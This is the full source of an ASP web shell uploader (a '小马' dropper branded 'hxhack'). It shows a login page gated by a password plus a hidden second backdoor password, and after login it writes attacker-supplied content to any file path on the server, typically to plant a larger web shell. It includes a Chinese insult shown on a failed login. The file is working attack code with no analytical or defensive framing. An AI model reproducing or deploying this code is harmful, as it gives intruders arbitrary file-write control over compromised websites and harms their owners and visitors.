%
dim Userpwd,URL
Userpwd = "xiaoma" 'User Password
URL = Request.ServerVariables("URL")
If Request("pwd")=Userpwd or Request("pwd")="www.i0day.com" then Session("mgler")=Userpwd
If Session("mgler")<>Userpwd Then
If Request.Form("pwd")<>"" Then
If Request.Form("pwd")=Userpwd Then
Session("mgler")=Userpwd
Response.Redirect URL
Else
Response.Write"操你大爷,密码都记不住!"
End If
Else
RW="
User Login"
RW=RW & "
【小 马 Asp】"
RW=RW & "
只取webshell 不改首页 不删文件 不提权
"
Response.Write RW
RW=""
End If
Response.End
End If
%>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="Success!"%>
<%else%>
<%="False!"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="Asp Upload Tool-hxhack"%>
<%="